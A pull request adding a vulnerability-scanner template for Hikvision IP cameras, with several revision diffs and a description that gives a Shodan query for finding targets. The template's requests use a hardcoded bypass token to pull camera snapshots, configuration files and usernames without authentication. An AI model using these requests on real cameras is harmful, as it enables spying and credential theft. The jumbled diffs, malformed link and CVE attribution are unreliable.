### PR TITLE
feat: Add hikvision-cam-info-exposure.yaml

### DIFF
--- a/vulnerabilities/iot/hikvision/hikvision-cam-info-exposure.yaml
+++ b/vulnerabilities/iot/hikvision/hikvision-cam-info-exposure.yaml
@@ -4,39 +4,34 @@ info:
   name: Hikvision IP Camera - Snapshot, Config, and User Info Exposure
   author: AbdulrahmanTamim
   severity: high
-  description: >
+  description: |
     Detects unauthenticated exposure of sensitive endpoints on vulnerable Hikvision IP cameras.
     This includes live snapshot feeds, encrypted configuration files, and full user credential XML.
     Based on exploit chaining of CVE-2021-36260 and related bypass logic.
   reference:
     - https://www.cve.org/CVERecord?id=CVE-2021-36260
-    - https://nvd.nist.gov/vuln/detail/CVE-2021-36260
+    - https://nvd.nist.nist.gov/vuln/detail/CVE-2021-36260
+    - https://seclists.org/fulldisclosure/2017/Sep/23
   tags: hikvision,iot,camera,cve,cve2021,exposure,auth-bypass,config,snapshot,xml
 
 variables:
   b64auth: YWRtaW46MTEK
 
 requests:
-
   - method: GET
     path:
       - "{{BaseURL}}/onvif-http/snapshot?auth={{b64auth}}"
     headers:
       User-Agent: Mozilla/5.0
     matchers:
-      - type: word
+      - name: "Unauthenticated Snapshot Exposure"
+        type: word
         part: header
         words:
           - "Content-Type: image/jpeg"
       - type: status
         status:
           - 200
-    extractors:
-      - type: regex
-        name: snapshot-endpoint
-        part: request
-        regex:
-          - "/onvif-http/snapshot\\?auth=.*"
 
   - method: GET
     path:
@@ -44,19 +39,14 @@ requests:
     headers:
       User-Agent: Mozilla/5.0
     matchers:
-      - type: word
+      - name: "Downloadable Config File"
+        type: word
         part: header
         words:
           - "Content-Type: application/octet-stream"
       - type: status
         status:
           - 200
-    extractors:
-      - type: regex
-        name: config-download
-        part: request
-        regex:
-          - "/System/configurationFile\\?auth=.*"
 
   - method: GET
     path:
@@ -64,7 +54,8 @@ requests:
     headers:
       User-Agent: Mozilla/5.0
     matchers:
-      - type: word
+      - name: "Exposed Usernames"
+        type: word
         words:
           - "<userName>"
           - "<userLevel>"
@@ -74,6 +65,7 @@ requests:
           - 200
     extractors:
       - type: regex
-        name: exposed-usernames
+        name: Usernames
+        group: 1
         regex:
           - "<userName>(.*?)</userName>"

--- a/vulnerabilities/iot/hikvision/hikvision-cam-info-exposure.yaml
+++ b/vulnerabilities/iot/hikvision/hikvision-cam-info-exposure.yaml
@@ -1,0 +1,79 @@
+id: hikvision-cam-info-exposure
+
+info:
+  name: Hikvision IP Camera - Snapshot, Config, and User Info Exposure
+  author: AbdulrahmanTamim
+  severity: high
+  description: >
+    Detects unauthenticated exposure of sensitive endpoints on vulnerable Hikvision IP cameras.
+    This includes live snapshot feeds, encrypted configuration files, and full user credential XML.
+    Based on exploit chaining of CVE-2021-36260 and related bypass logic.
+  reference:
+    - https://www.cve.org/CVERecord?id=CVE-2021-36260
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-36260
+  tags: hikvision,iot,camera,cve,cve2021,exposure,auth-bypass,config,snapshot,xml
+
+variables:
+  b64auth: YWRtaW46MTEK
+
+requests:
+
+  - method: GET
+    path:
+      - "{{BaseURL}}/onvif-http/snapshot?auth={{b64auth}}"
+    headers:
+      User-Agent: Mozilla/5.0
+    matchers:
+      - type: word
+        part: header
+        words:
+          - "Content-Type: image/jpeg"
+      - type: status
+        status:
+          - 200
+    extractors:
+      - type: regex
+        name: snapshot-endpoint
+        part: request
+        regex:
+          - "/onvif-http/snapshot\\?auth=.*"
+
+  - method: GET
+    path:
+      - "{{BaseURL}}/System/configurationFile?auth={{b64auth}}"
+    headers:
+      User-Agent: Mozilla/5.0
+    matchers:
+      - type: word
+        part: header
+        words:
+          - "Content-Type: application/octet-stream"
+      - type: status
+        status:
+          - 200
+    extractors:
+      - type: regex
+        name: config-download
+        part: request
+        regex:
+          - "/System/configurationFile\\?auth=.*"
+
+  - method: GET
+    path:
+      - "{{BaseURL}}/Security/users?auth={{b64auth}}"
+    headers:
+      User-Agent: Mozilla/5.0
+    matchers:
+      - type: word
+        words:
+          - "<userName>"
+          - "<userLevel>"
+        condition: and
+      - type: status
+        status:
+          - 200
+    extractors:
+      - type: regex
+        name: exposed-usernames
+        regex:
+          - "<userName>(.*?)</userName>"

--- a/vulnerabilities/iot/hikvision/hikvision-cam-info-exposure.yaml
+++ b/vulnerabilities/iot/hikvision/hikvision-cam-info-exposure.yaml
@@ -1,11 +1,11 @@
 id: hikvision-cam-info-exposure
 
 info:
-  name: Hikvision IP Camera - Snapshot, Config, and User Info Exposure
+  name: Hikvision IP Camera - Info Exposure
   author: AbdulrahmanTamim
   severity: high
   description: |
-    Detected unauthenticated exposure of sensitive endpoints on vulnerable Hikvision IP cameras.Included live snapshot feeds, encrypted configuration files, and full user credential XML via CVE-2021-36260 exploit chaining and bypass logic.
+    Unauthenticated exposure of sensitive endpoints was detected on vulnerable Hikvision IP cameras. This included live snapshot feeds, encrypted configuration files, and full user credential XML through CVE-2021-36260 exploit chaining and bypass logic.
   reference:
     - https://www.exploit-db.com/exploits/45231
     - https://www.cve.org/CVERecord?id=CVE-2021-36260
@@ -19,33 +19,7 @@ info:
 variables:
   b64auth: YWRtaW46MTEK
 
-flow: http(1) && http(2) && http(3)
-
 http:
-  - method: GET
-    path:
-      - "{{BaseURL}}/onvif-http/snapshot?auth={{b64auth}}"
-
-    matchers:
-      - type: dsl
-        name: Snapshot Exposure
-        dsl:
-          - contains(header, "image/jpeg")
-          - status_code == 200
-        condition: and
-
-
-  - method: GET
-    path:
-      - "{{BaseURL}}/System/configurationFile?auth={{b64auth}}"
-
-    matchers:
-      - type: dsl
-        name: Config File
-        dsl:
-          - status_code == 200
-          - contains(body, "application/octet-stream")
-
   - method: GET
     path:
       - "{{BaseURL}}/Security/users?auth={{b64auth}}"

--- a/vulnerabilities/iot/hikvision/hikvision-cam-info-exposure.yaml
+++ b/vulnerabilities/iot/hikvision/hikvision-cam-info-exposure.yaml
@@ -14,7 +14,7 @@ info:
   metadata:
     verified: true
     shodan-query: 3.1.3.150324
-  tags: hikvision,iot,camera,cve,cve2021,exposure
+  tags: hikvision,iot,camera,exposure
 
 variables:
   b64auth: YWRtaW46MTEK
@@ -28,7 +28,8 @@ http:
       - type: dsl
         name: Usernames
         dsl:
-          - contains(body, "userName") && contains(body, "userLevel")
+          - contains_all(body, "userName","userLevel")
+          - contains(content_type,"application/xml")
           - status_code == 200
         condition: and
 

--- a/vulnerabilities/iot/hikvision/hikvision-cam-info-exposure.yaml
+++ b/vulnerabilities/iot/hikvision/hikvision-cam-info-exposure.yaml
@@ -5,64 +5,59 @@ info:
   author: AbdulrahmanTamim
   severity: high
   description: |
-    Detects unauthenticated exposure of sensitive endpoints on vulnerable Hikvision IP cameras.
-    This includes live snapshot feeds, encrypted configuration files, and full user credential XML.
-    Based on exploit chaining of CVE-2021-36260 and related bypass logic.
+    Detected unauthenticated exposure of sensitive endpoints on vulnerable Hikvision IP cameras.Included live snapshot feeds, encrypted configuration files, and full user credential XML via CVE-2021-36260 exploit chaining and bypass logic.
   reference:
+    - https://www.exploit-db.com/exploits/45231
     - https://www.cve.org/CVERecord?id=CVE-2021-36260
     - https://nvd.nist.nist.gov/vuln/detail/CVE-2021-36260
     - https://seclists.org/fulldisclosure/2017/Sep/23
-  tags: hikvision,iot,camera,cve,cve2021,exposure,auth-bypass,config,snapshot,xml
+  metadata:
+    verified: true
+    shodan-query: 3.1.3.150324
+  tags: hikvision,iot,camera,cve,cve2021,exposure
 
 variables:
   b64auth: YWRtaW46MTEK
 
-requests:
+flow: http(1) && http(2) && http(3)
+
+http:
   - method: GET
     path:
       - "{{BaseURL}}/onvif-http/snapshot?auth={{b64auth}}"
-    headers:
-      User-Agent: Mozilla/5.0
+
     matchers:
-      - name: "Unauthenticated Snapshot Exposure"
-        type: word
-        part: header
-        words:
-          - "Content-Type: image/jpeg"
-      - type: status
-        status:
-          - 200
+      - type: dsl
+        name: Snapshot Exposure
+        dsl:
+          - contains(header, "image/jpeg")
+          - status_code == 200
+        condition: and
+
 
   - method: GET
     path:
       - "{{BaseURL}}/System/configurationFile?auth={{b64auth}}"
-    headers:
-      User-Agent: Mozilla/5.0
+
     matchers:
-      - name: "Downloadable Config File"
-        type: word
-        part: header
-        words:
-          - "Content-Type: application/octet-stream"
-      - type: status
-        status:
-          - 200
+      - type: dsl
+        name: Config File
+        dsl:
+          - status_code == 200
+          - contains(body, "application/octet-stream")
 
   - method: GET
     path:
       - "{{BaseURL}}/Security/users?auth={{b64auth}}"
-    headers:
-      User-Agent: Mozilla/5.0
+
     matchers:
-      - name: "Exposed Usernames"
-        type: word
-        words:
-          - "<userName>"
-          - "<userLevel>"
+      - type: dsl
+        name: Usernames
+        dsl:
+          - contains(body, "userName") && contains(body, "userLevel")
+          - status_code == 200
         condition: and
-      - type: status
-        status:
-          - 200
+
     extractors:
       - type: regex
         name: Usernames


### PR DESCRIPTION
### Template / PR Information

- Added CVE-2021-36260 - Hikvision IP Camera Info Exposure

This template detects unauthenticated exposure of sensitive information on vulnerable Hikvision IP cameras, including:
* Live snapshot feeds
* Encrypted configuration files
* Full user credential XML

It leverages exploit chaining and bypass logic related to CVE-2021-36260.

## Finding Targets

You can find potential targets using Shodan with the following Shodan dork:
```
3.1.3.150324
```
This dork searches for Hikvision cameras with the specific Web Portal version.


### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO

#### Additional Details

Original Project : [https://github.com/tamim1089/HikvisionExploiter](https://github.com/tamim1089/HikvisionExploiter)

### Vulnerable Target Usage Example:
 
![image](https://github.com/user-attachments/assets/1d5bd3ee-bb03-4aaa-8c78-620f175896ef)

### Non-Vulnerable Target Usage Example:

![image](https://github.com/user-attachments/assets/ecd507b1-3860-4702-a343-c0fe70185a0f)


- References:
    - https://www.cve.org/CVERecord?id=CVE-2021-36260
    - https://nvd.nist.gov/vuln/detail/CVE-2021-36260
    - https://seclists.org/fulldisclosure/2017/Sep/23


**Template Code:**

```yaml
id: hikvision-cam-info-exposure

info:
  name: Hikvision IP Camera - Snapshot, Config, and User Info Exposure
  author: AbdulrahmanTamim
  severity: high
  description: |
    Detects unauthenticated exposure of sensitive endpoints on vulnerable Hikvision IP cameras.
    This includes live snapshot feeds, encrypted configuration files, and full user credential XML.
    Based on exploit chaining of CVE-2021-36260 and related bypass logic.
  reference:
    - https://www.cve.org/CVERecord?id=CVE-2021-36260
    - https://nvd.nist.nist.gov/vuln/detail/CVE-2021-36260
    - https://seclists.org/fulldisclosure/2017/Sep/23
  tags: hikvision,iot,camera,cve,cve2021,exposure,auth-bypass,config,snapshot,xml

variables:
  b64auth: YWRtaW46MTEK

requests:
  - method: GET
    path:
      - "{{BaseURL}}/onvif-http/snapshot?auth={{b64auth}}"
    headers:
      User-Agent: Mozilla/5.0
    matchers:
      - name: "Unauthenticated Snapshot Exposure"
        type: word
        part: header
        words:
          - "Content-Type: image/jpeg"
      - type: status
        status:
          - 200

  - method: GET
    path:
      - "{{BaseURL}}/System/configurationFile?auth={{b64auth}}"
    headers:
      User-Agent: Mozilla/5.0
    matchers:
      - name: "Downloadable Config File"
        type: word
        part: header
        words:
          - "Content-Type: application/octet-stream"
      - type: status
        status:
          - 200

  - method: GET
    path:
      - "{{BaseURL}}/Security/users?auth={{b64auth}}"
    headers:
      User-Agent: Mozilla/5.0
    matchers:
      - name: "Exposed Usernames"
        type: word
        words:
          - "<userName>"
          - "<userLevel>"
        condition: and
      - type: status
        status:
          - 200
    extractors:
      - type: regex
        name: Usernames
        group: 1
        regex:
          - "<userName>(.*?)</userName>"